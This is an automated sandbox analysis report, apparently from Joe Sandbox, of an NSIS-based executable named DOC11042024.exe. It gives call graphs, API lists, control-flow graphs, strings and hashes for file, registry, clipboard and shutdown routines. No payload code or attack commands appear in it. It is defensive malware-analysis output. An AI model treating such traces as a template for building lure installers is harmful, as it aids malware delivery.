API calls 3796->3799 3797->3793 3802 403976 lstrlenW 3797->3802 3805 405937 CharNextW 3797->3805 3800 403a73 3798->3800 3801 4039f4 RegisterClassW 3798->3801 3799->3798 3804 40140b 2 API calls 3800->3804 3803 403a2a SystemParametersInfoW CreateWindowExW 3801->3803 3830 403a7d 3801->3830 3806 403984 lstrcmpiW 3802->3806 3807 4039aa 3802->3807 3803->3800 3808 403a79 3804->3808 3809 403973 3805->3809 3806->3807 3810 403994 GetFileAttributesW 3806->3810 3811 40590a 3 API calls 3807->3811 3813 403b4c 19 API calls 3808->3813 3808->3830 3809->3802 3812 4039a0 3810->3812 3814 4039b0 3811->3814 3812->3807 3816 405956 2 API calls 3812->3816 3817 403a8a 3813->3817 3865 405ea2 lstrcpynW 3814->3865 3816->3807 3818 403a96 ShowWindow LoadLibraryW 3817->3818 3819 403b19 3817->3819 3820 403ab5 LoadLibraryW 3818->3820 3821 403abc GetClassInfoW 3818->3821 3822 405229 5 API calls 3819->3822 3820->3821 3823 403ad0 GetClassInfoW RegisterClassW 3821->3823 3824 403ae6 DialogBoxParamW 3821->3824 3825 403b1f 3822->3825 3823->3824 3826 40140b 2 API calls 3824->3826 3827 403b23 3825->3827 3828 403b3b 3825->3828 3826->3830 3827->3830 3831 40140b 2 API calls 3827->3831 3829 40140b 2 API calls 3828->3829 3829->3830 3830->3733 3831->3830 3832->3676 3833->3718 3834->3723 3836 403795 CloseHandle 3835->3836 3837 40379f 3835->3837 3836->3837 3838 4037b3 3837->3838 3839 4037a9 CloseHandle 3837->3839 3867 4037e1 3838->3867 3839->3838 3842 405731 71 API calls 3843 4035e3 OleUninitialize 3842->3843 3843->3697 3843->3698 3844->3710 3845->3735 3847 405b67 GetTickCount GetTempFileNameW 3846->3847 3848 40331a 3847->3848 3849 405b9d 3847->3849 3848->3678 3849->3847 3849->3848 3850->3750 3851->3752 3852->3756 3853->3767 3854->3775 3856 403b60 3855->3856 3866 405de9 wsprintfW 3856->3866 3858 403bd1 3859 405ec4 18 API calls 3858->3859 3860 403bdd SetWindowTextW 3859->3860 3861 403901 3860->3861 3862 403bf9 3860->3862 3861->3791 3862->3861 3863 405ec4 18 API calls 3862->3863 3863->3862 3864->3787 3865->3793 3866->3858 3868 4037ef 3867->3868 3869 4037b8 3868->3869 3870 4037f4 FreeLibrary GlobalFree 3868->3870 3869->3842 3870->3869 3870->3870 4402 40149e 4403 4014ac PostQuitMessage 4402->4403 4404 40223c 4402->4404 4403->4404 4405 40219e 4406 402ad0 18 API calls 4405->4406 4407 4021a4 4406->4407 4408 402ad0 18 API calls 4407->4408 4409 4021ad 4408->4409 4410 402ad0 18 API calls 4409->4410 4411 4021b6 4410->4411 4412 4061e5 2 API calls 4411->4412 4413 4021bf 4412->4413 4414 4021d0 lstrlenW lstrlenW 4413->4414 4418 4021c3 4413->4418 4416 405156 25 API calls 4414->4416 4415 405156 25 API calls 4419 4021cb 4415->4419 4417 40220e SHFileOperationW 4416->4417 4417->4418 4417->4419 4418->4415 4418->4419 4420 401b22 4421 401b73 4420->4421 4422 401b2f 4420->4422 4424 401b78 4421->4424 4425 401b9d GlobalAlloc 4421->4425 4423 402229 4422->4423 4429 401b46 4422->4429 4427 405ec4 18 API calls 4423->4427 4438 401bb8 4424->4438 4441 405ea2 lstrcpynW 4424->4441 4426 405ec4 18 API calls 4425->4426 4426->4438 4428 402236 4427->4428 4433 405685 MessageBoxIndirectW 4428->4433 4439 405ea2 lstrcpynW 4429->4439 4431 401b8a GlobalFree 4431->4438 4433->4438 4434 401b55 4440 405ea2 lstrcpynW 4434->4440 4436 401b64 4442 405ea2 lstrcpynW 4436->4442 4439->4434 4440->4436 4441->4431 4442->4438 4443 402222 4444 40223c 4443->4444 4445 402229 4443->4445 4446 405ec4 18 API calls 4445->4446 4447 402236 4446->4447 4448 405685 MessageBoxIndirectW 4447->4448 4448->4444 3000 401924 3001 401926 3000->3001 3006 402ad0 3001->3006 3007 402adc 3006->3007 3052 405ec4 3007->3052 3010 40192b 3012 405731 3010->3012 3091 405a12 3012->3091 3015 405770 3018 4058b1 3015->3018 3105 405ea2 lstrcpynW 3015->3105 3016 405759 DeleteFileW 3017 401934 3016->3017 3018->3017 3135 4061e5 FindFirstFileW 3018->3135 3020 405796 3021 4057a9 3020->3021 3022 40579c lstrcatW 3020->3022 3106 405956 lstrlenW 3021->3106 3024 4057af 3022->3024 3027 4057bf lstrcatW 3024->3027 3029 4057ca lstrlenW FindFirstFileW 3024->3029 3027->3029 3028 4058cf 3138 40590a lstrlenW CharPrevW 3028->3138 3030 4058a6 3029->3030 3050 4057ed 3029->3050 3030->3018 3032 405937 CharNextW 3032->3050 3034 4056e9 5 API calls 3035 4058e1 3034->3035 3036 4058e5 3035->3036 3037 4058fb 3035->3037 3036->3017 3042 405156 25 API calls 3036->3042 3038 405156 25 API calls 3037->3038 3038->3017 3039 405885 FindNextFileW 3041 40589d FindClose 3039->3041 3039->3050 3041->3030 3043 4058f2 3042->3043 3045 405d3c 40 API calls 3043->3045 3046 4058f9 3045->3046 3046->3017 3047 405731 64 API calls 3047->3050 3048 405156 25 API calls 3048->3039 3050->3032 3050->3039 3050->3047 3050->3048 3110 405ea2 lstrcpynW 3050->3110 3111 4056e9 3050->3111 3119 405156 3050->3119 3130 405d3c 3050->3130 3065 405ed1 3052->3065 3053 40611c 3054 402afd 3053->3054 3086 405ea2 lstrcpynW 3053->3086 3054->3010 3070 406136 3054->3070 3056 405f84 GetVersion 3056->3065 3057 4060ea lstrlenW 3057->3065 3060 405ec4 10 API calls 3060->3057 3061 405fff GetSystemDirectoryW 3061->3065 3063 406012 GetWindowsDirectoryW 3063->3065 3064 406136 5 API calls 3064->3065 3065->3053 3065->3056 3065->3057 3065->3060 3065->3061 3065->3063 3065->3064 3066 406046 SHGetSpecialFolderLocation 3065->3066 3067 405ec4 10 API calls 3065->3067 3068 40608b lstrcatW 3065->3068 3079 405d6f RegOpenKeyExW 3065->3079 3084 405de9 wsprintfW 3065->3084 3085 405ea2 lstrcpynW 3065->3085 3066->3065 3069 40605e SHGetPathFromIDListW CoTaskMemFree 3066->3069 3067->3065 3068->3065 3069->3065 3071 406143 3070->3071 3073 4061ac CharNextW 3071->3073 3074 4061b9 3071->3074 3077 406198 CharNextW 3071->3077 3078 4061a7 CharNextW 3071->3078 3087 405937 3071->3087 3072 4061be CharPrevW 3072->3074 3073->3071 3073->3074 3074->3072 3075 4061df 3074->3075 3075->3010 3077->3071 3078->3073 3080 405de3 3079->3080 3081 405da3 RegQueryValueExW 3079->3081 3080->3065 3082 405dc4 RegCloseKey 3081->3082 3082->3080 3084->3065 3085->3065 3086->3054 3088 40593d 3087->3088 3089 405953 3088->3089 3090 405944 CharNextW 3088->3090 3089->3071 3090->3088 3141 405ea2 lstrcpynW 3091->3141 3093 405a23 3142 4059b5 CharNextW CharNextW 3093->3142 3096 405751 3096->3015 3096->3016 3097 406136 5 API calls 3103 405a39 3097->3103 3098 405a6a lstrlenW 3099 405a75 3098->3099 3098->3103 3101 40590a 3 API calls 3099->3101 3100 4061e5 2 API calls 3100->3103 3102 405a7a GetFileAttributesW 3101->3102 3102->3096 3103->3096 3103->3098 3103->3100 3104 405956 2 API calls 3103->3104 3104->3098 3105->3020 3107 405964 3106->3107 3108 405976 3107->3108 3109 40596a CharPrevW 3107->3109 3108->3024 3109->3107 3109->3108 3110->3050 3148 405b06 GetFileAttributesW 3111->3148 3114 405704 RemoveDirectoryW 3117 405712 3114->3117 3115 40570c DeleteFileW 3115->3117 3116 405716 3116->3050 3117->3116 3118 405722 SetFileAttributesW 3117->3118 3118->3116 3120 405171 3119->3120 3128 405213 3119->3128 3121 40518d lstrlenW 3120->3121 3124 405ec4 18 API calls 3120->3124 3122 4051b6 3121->3122 3123 40519b lstrlenW 3121->3123 3126 4051c9 3122->3126 3127 4051bc SetWindowTextW 3122->3127 3125 4051ad lstrcatW 3123->3125 3123->3128 3124->3121 3125->3122 3126->3128 3129 4051cf SendMessageW SendMessageW SendMessageW 3126->3129 3127->3126 3128->3050 3129->3128 3151 40620c GetModuleHandleA 3130->3151 3134 405d64 3134->3050 3136 4058cb 3135->3136 3137 4061fb FindClose 3135->3137 3136->3017 3136->3028 3137->3136 3139 4058d5 3138->3139 3140 405926 lstrcatW 3138->3140 3139->3034 3140->3139 3141->3093 3143 4059d2 3142->3143 3146 4059e4 3142->3146 3145 4059df CharNextW 3143->3145 3143->3146 3144 405a08 3144->3096 3144->3097 3145->3144 3146->3144 3147 405937 CharNextW 3146->3147 3147->3146 3149 4056f5 3148->3149 3150 405b18 SetFileAttributesW 3148->3150 3149->3114 3149->3115 3149->3116 3150->3149 3152 406233 GetProcAddress 3151->3152 3153 406228 LoadLibraryA 3151->3153 3154 405d43 3152->3154 3153->3152 3153->3154 3154->3134 3155 405bae lstrcpyW 3154->3155 3156 405bd7 3155->3156 3157 405bfd GetShortPathNameW 3155->3157 3179 405b2b GetFileAttributesW CreateFileW 3156->3179 3158 405c12 3157->3158 3159 405d36 3157->3159 3158->3159 3162 405c1a wsprintfA 3158->3162 3159->3134 3161 405be1 CloseHandle GetShortPathNameW 3161->3159 3163 405bf5 3161->3163 3164 405ec4 18 API calls 3162->3164 3163->3157 3163->3159 3165 405c42 3164->3165 3180 405b2b GetFileAttributesW CreateFileW 3165->3180 3167 405c4f 3167->3159 3168 405c5e GetFileSize GlobalAlloc 3167->3168 3169 405c80 ReadFile 3168->3169 3170 405d2f CloseHandle 3168->3170 3169->3170 3171 405c98 3169->3171 3170->3159 3171->3170 3181 405a90 lstrlenA 3171->3181 3174 405cb1 lstrcpyA 3177 405cd3 3174->3177 3175 405cc5 3176 405a90 4 API calls 3175->3176 3176->3177 3178 405d0a SetFilePointer WriteFile GlobalFree 3177->3178 3178->3170 3179->3161 3180->3167 3182 405ad1 lstrlenA 3181->3182 3183 405ad9 3182->3183 3184 405aaa lstrcmpiA 3182->3184 3183->3174 3183->3175 3184->3183 3185 405ac8 CharNextA 3184->3185 3185->3182 4449 401cab 4450 402ab3 18 API calls 4449->4450 4451 401cb2 4450->4451 4452 402ab3 18 API calls 4451->4452 4453 401cba GetDlgItem 4452->4453 4454 4024e6 4453->4454 3256 40232f 3257 402335 3256->3257 3258 402ad0 18 API calls 3257->3258 3259 402347 3258->3259 3260 402ad0 18 API calls 3259->3260 3261 402351 RegCreateKeyExW 3260->3261 3262 40237b 3261->3262 3263 402729 3261->3263 3264 402396 3262->3264 3265 402ad0 18 API calls 3262->3265 3266 4023a2 3264->3266 3268 402ab3 18 API calls 3264->3268 3267 40238c lstrlenW 3265->3267 3269 4023bd RegSetValueExW 3266->3269 3273 402ff8 3266->3273 3267->3264 3268->3266 3271 4023d3 RegCloseKey 3269->3271 3271->3263 3274 403025 3273->3274 3275 403009 SetFilePointer 3273->3275 3288 403123 GetTickCount 3274->3288 3275->3274 3278 403036 ReadFile 3279 403056 3278->3279 3287 4030e2 3278->3287 3280 403123 43 API calls 3279->3280 3279->3287 3281 40306d 3280->3281 3282 4030e8 ReadFile 3281->3282 3284 40307d 3281->3284 3281->3287 3282->3287 3285 403098 ReadFile 3284->3285 3286 4030b1 WriteFile 3284->3286 3284->3287 3285->3284 3285->3287 3286->3284 3286->3287 3287->3269 3289 403152 3288->3289 3290 40328d 3288->3290 3301 4032d1 SetFilePointer 3289->3301 3291 402cb0 33 API calls 3290->3291 3297 40302e 3291->3297 3293 40315d SetFilePointer 3299 403182 3293->3299 3297->3278 3297->3287 3298 403217 WriteFile 3298->3297 3298->3299 3299->3297 3299->3298 3300 40326e SetFilePointer 3299->3300 3302 40329f ReadFile 3299->3302 3304 406348 3299->3304 3311 402cb0 3299->3311 3300->3290 3301->3293 3303 4032c0 3302->3303 3303->3299 3305 40636d 3304->3305 3306 406375 3304->3306 3305->3299 3306->3305 3307 406405 GlobalAlloc 3306->3307 3308 4063fc GlobalFree 3306->3308 3309 406473 GlobalFree 3306->3309 3310 40647c GlobalAlloc 3306->3310 3307->3305 3307->3306 3308->3307 3309->3310 3310->3305 3310->3306 3312 402cc1 3311->3312 3313 402cd9 3311->3313 3316 402cd1 3312->3316 3317 402cca DestroyWindow 3312->3317 3314 402ce1 3313->3314 3315 402ce9 GetTickCount 3313->3315 3326 406245 3314->3326 3315->3316 3319 402cf7 3315->3319 3316->3299 3317->3316 3320 402d2c CreateDialogParamW ShowWindow 3319->3320 3321 402cff 3319->3321 3320->3316 3321->3316 3330 402c94 3321->3330 3323 402d0d wsprintfW 3324 405156 25 API calls 3323->3324 3325 402d2a 3324->3325 3325->3316 3327 406262 PeekMessageW 3326->3327 3328 406272 3327->3328 3329 406258 DispatchMessageW 3327->3329 3328->3316 3329->3327 3331 402ca3 3330->3331 3332 402ca5 MulDiv 3330->3332 3331->3332 3332->3323 4469 4016af 4470 402ad0 18 API calls 4469->4470 4471 4016b5 GetFullPathNameW 4470->4471 4472 4016f1 4471->4472 4473 4016cf 4471->4473 4474 401706 GetShortPathNameW 4472->4474 4475 40295d 4472->4475 4473->4472 4476 4061e5 2 API calls 4473->4476 4474->4475 4477 4016e1 4476->4477 4477->4472 4479 405ea2 lstrcpynW 4477->4479 4479->4472 4480 403834 4481 40383f 4480->4481 4482 403846 GlobalAlloc 4481->4482 4483 403843 4481->4483 4482->4483 4491 402938 SendMessageW 4492 402952 InvalidateRect 4491->4492 4493 40295d 4491->4493 4492->4493 4494 4014b8 4495 4014be 4494->4495 4496 401389 2 API calls 4495->4496 4497 4014c6 4496->4497 3642 4015b9 3643 402ad0 18 API calls 3642->3643 3644 4015c0 3643->3644 3645 4059b5 4 API calls 3644->3645 3656 4015c9 3645->3656 3646 401614 3648 401646 3646->3648 3649 401619 3646->3649 3647 405937 CharNextW 3650 4015d7 CreateDirectoryW 3647->3650 3654 401423 25 API calls 3648->3654 3651 401423 25 API calls 3649->3651 3653 4015ed GetLastError 3650->3653 3650->3656 3652 401620 3651->3652 3660 405ea2 lstrcpynW 3652->3660 3653->3656 3657 4015fa GetFileAttributesW 3653->3657 3659 40163e 3654->3659 3656->3646 3656->3647 3657->3656 3658 40162d SetCurrentDirectoryW 3658->3659 3660->3658 4498 401939 4499 402ad0 18 API calls 4498->4499 4500 401940 lstrlenW 4499->4500 4501 4024e6 4500->4501 4502 40423f lstrlenW 4503 404260 WideCharToMultiByte 4502->4503 4504 40425e 4502->4504 4504->4503 4505 40173f 4506 402ad0 18 API calls 4505->4506 4507 401746 4506->4507 4508 405b5a 2 API calls 4507->4508 4509 40174d 4508->4509 4509->4509 4510 4026bf 4511 4026c6 4510->4511 4512 40295d 4510->4512 4513 4026cc FindClose 4511->4513 4513->4512

                                                                              Executed Functions

                                                                              Function 0040331C Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335stringfilecomCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 40331c-4033b2 #17 SetErrorMode OleInitialize call 40620c SHGetFileInfoW call 405ea2 GetCommandLineW call 405ea2 GetModuleHandleW 7 4033b4-4033bb 0->7 8 4033bc-4033ce call 405937 CharNextW 0->8 7->8 11 40349c-4034a2 8->11 12 4033d3-4033d9 11->12 13 4034a8 11->13 15 4033e2-4033e8 12->15 16 4033db-4033e0 12->16 14 4034bc-4034d6 GetTempPathW call 4032e8 13->14 25 4034d8-4034f6 GetWindowsDirectoryW lstrcatW call 4032e8 14->25 26 40352e-403548 DeleteFileW call 402d52 14->26 17 4033ea-4033ee 15->17 18 4033ef-4033f3 15->18 16->15 16->16 17->18 20 4033f9-4033ff 18->20 21 40348d-403498 call 405937 18->21 23 403401-403408 20->23 24 403419-403430 20->24 21->11 36 40349a-40349b 21->36 30 40340a-40340d 23->30 31 40340f 23->31 32 403432-403448 24->32 33 40345e-403474 24->33 25->26 44 4034f8-403528 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4032e8 25->44 40 4035de-4035ed call 403784 OleUninitialize 26->40 41 40354e-403554 26->41 30->24 30->31 31->24 32->33 37 40344a-403452 32->37 33->21 39 403476-40348b 33->39 36->11 42 403454-403457 37->42 43 403459 37->43 39->21 45 4034aa-4034b7 call 405ea2 39->45 57 4035f3-403603 call 405685 ExitProcess 40->57 58 4036e9-4036ef 40->58 46 403556-403561 call 405937 41->46 47 4035ce-4035d5 call 403876 41->47 42->33 42->43 43->33 44->26 44->40 45->14 61 403563-403574 46->61 62 403598-4035a2 46->62 56 4035da 47->56 56->40 59 4036f1-40370e call 40620c * 3 58->59 60 40376c-403774 58->60 92 403710-403712 59->92 93 403758-403763 ExitWindowsEx 59->93 66 403776 60->66 67 40377a-40377e ExitProcess 60->67 65 403576-403578 61->65 68 4035a4-4035b2 call 405a12 62->68 69 403609-403623 lstrcatW lstrcmpiW 62->69 72 403592-403596 65->72 73 40357a-403590 65->73 66->67 68->40 82 4035b4-4035ca call 405ea2 * 2 68->82 69->40 75 403625-40363b CreateDirectoryW SetCurrentDirectoryW 69->75 72->62 72->65 73->62 73->72 78 403648-403671 call 405ea2 75->78 79 40363d-403643 call 405ea2 75->79 88 403676-403692 call 405ec4 DeleteFileW 78->88 79->78 82->47 98 4036d3-4036db 88->98 99 403694-4036a4 CopyFileW 88->99 92->93 97 403714-403716 92->97 93->60 96 403765-403767 call 40140b 93->96 96->60 97->93 101 403718-40372a GetCurrentProcess 97->101 98->88 102 4036dd-4036e4 call 405d3c 98->102 99->98 103 4036a6-4036c6 call 405d3c call 405ec4 call 405624 99->103 101->93 107 40372c-40374e 101->107 102->40 103->98 115 4036c8-4036cf CloseHandle 103->115 107->93 115->98
                                                                              APIs
                                                                              • #17.COMCTL32 ref: 0040333B
                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403346
                                                                              • OleInitialize.OLE32(00000000), ref: 0040334D
                                                                                • Part of subcall function 0040620C: GetModuleHandleA.KERNEL32(?,?,00000020,0040335F,00000008), ref: 0040621E
                                                                                • Part of subcall function 0040620C: LoadLibraryA.KERNELBASE(?,?,00000020,0040335F,00000008), ref: 00406229
                                                                                • Part of subcall function 0040620C: GetProcAddress.KERNEL32(00000000,?), ref: 0040623A
                                                                              • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 00403375
                                                                                • Part of subcall function 00405EA2: lstrcpynW.KERNEL32(?,?,00000400,0040338A,004281E0,NSIS Error), ref: 00405EAF
                                                                              • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 0040338A
                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\DOC11042024.exe",00000000), ref: 0040339D
                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DOC11042024.exe",00000020), ref: 004033C4
                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004034CD
                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034DE
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034EA
                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034FE
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403506
                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403517
                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040351F
                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403533
                                                                              • OleUninitialize.OLE32(?), ref: 004035E3
                                                                              • ExitProcess.KERNEL32 ref: 00403603
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\DOC11042024.exe",00000000,?), ref: 0040360F
                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\DOC11042024.exe",00000000,?), ref: 0040361B
                                                                              • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403627
                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040362E
                                                                              • DeleteFileW.KERNEL32(0041FE90,0041FE90,?, rigges$,?), ref: 00403688
                                                                              • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 0040369C
                                                                              • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 004036C9
                                                                              • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040371F
                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0040375B
                                                                              • ExitProcess.KERNEL32 ref: 0040377E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                              • String ID: rigges$$"C:\Users\user\Desktop\DOC11042024.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213$C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                              • API String ID: 4107622049-1887619979
                                                                              • Opcode ID: dedd7760869b51cc3789464f0ef13e4d4bcf11ee4ae3e05b52bf87ec2d5dcacc
                                                                              • Instruction ID: cf78befff12c504e24143c894f85e75cf82b38a3423bbf9974adc7f0ee345733
                                                                              • Opcode Fuzzy Hash: dedd7760869b51cc3789464f0ef13e4d4bcf11ee4ae3e05b52bf87ec2d5dcacc
                                                                              • Instruction Fuzzy Hash: 5CB1C470A04211BAD7207F629D49A7B3EACEB45706F00453FF541B62E2D77C9A41CBAE
                                                                              Function 00405295 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 116 405295-4052b0 117 405441-405448 116->117 118 4052b6-40537f GetDlgItem * 3 call 404126 call 4049f3 GetClientRect GetSystemMetrics SendMessageW * 2 116->118 120 405472-40547f 117->120 121 40544a-40546c GetDlgItem CreateThread CloseHandle 117->121 139 405381-40539b SendMessageW * 2 118->139 140 40539d-4053a0 118->140 123 405481-405487 120->123 124 40549d-4054a4 120->124 121->120 126 405489-405498 ShowWindow * 2 call 404126 123->126 127 4054bf-4054c8 call 404158 123->127 128 4054a6-4054ac 124->128 129 4054fb-4054ff 124->129 126->124 136 4054cd-4054d1 127->136 134 4054d4-4054e4 ShowWindow 128->134 135 4054ae-4054ba call 4040ca 128->135 129->127 132 405501-405504 129->132 132->127 141 405506-405519 SendMessageW 132->141 137 4054f4-4054f6 call 4040ca 134->137 138 4054e6-4054ef call 405156 134->138 135->127 137->129 138->137 139->140 145 4053b0-4053c7 call 4040f1 140->145 146 4053a2-4053ae SendMessageW 140->146 147 40561d-40561f 141->147 148 40551f-405540 CreatePopupMenu call 405ec4 AppendMenuW 141->148 155 4053c9-4053dd ShowWindow 145->155 156 4053fd-40541e GetDlgItem SendMessageW 145->156 146->145 147->136 153 405542-405553 GetWindowRect 148->153 154 405555-40555b 148->154 157 40555e-405576 TrackPopupMenu 153->157 154->157 158 4053ec 155->158 159 4053df-4053ea ShowWindow 155->159 156->147 160 405424-40543c SendMessageW * 2 156->160 157->147 161 40557c-405593 157->161 162 4053f2-4053f8 call 404126 158->162 159->162 160->147 163 405598-4055b3 SendMessageW 161->163 162->156 163->163 165 4055b5-4055d8 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 163->165 166 4055da-405601 SendMessageW 165->166 166->166 167 405603-405617 GlobalUnlock SetClipboardData CloseClipboard 166->167 167->147
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000403), ref: 004052F4
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405303
                                                                              • GetClientRect.USER32(?,?), ref: 00405340
                                                                              • GetSystemMetrics.USER32(00000015), ref: 00405348
                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405369
                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040537A
                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040538D
                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040539B
                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053AE
                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053D0
                                                                              • ShowWindow.USER32(?,00000008), ref: 004053E4
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405405
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405415
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040542E
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040543A
                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405312
                                                                                • Part of subcall function 00404126: SendMessageW.USER32(00000028,?,00000001,00403F52), ref: 00404134
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405457
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005229,00000000), ref: 00405465
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 0040546C
                                                                              • ShowWindow.USER32(00000000), ref: 00405490
                                                                              • ShowWindow.USER32(?,00000008), ref: 00405495
                                                                              • ShowWindow.USER32(00000008), ref: 004054DC
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550E
                                                                              • CreatePopupMenu.USER32 ref: 0040551F
                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405534
                                                                              • GetWindowRect.USER32(?,?), ref: 00405547
                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040556B
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055A6
                                                                              • OpenClipboard.USER32(00000000), ref: 004055B6
                                                                              • EmptyClipboard.USER32 ref: 004055BC
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 004055C8
                                                                              • GlobalLock.KERNEL32(00000000), ref: 004055D2
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E6
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405606
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405611
                                                                              • CloseClipboard.USER32 ref: 00405617
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
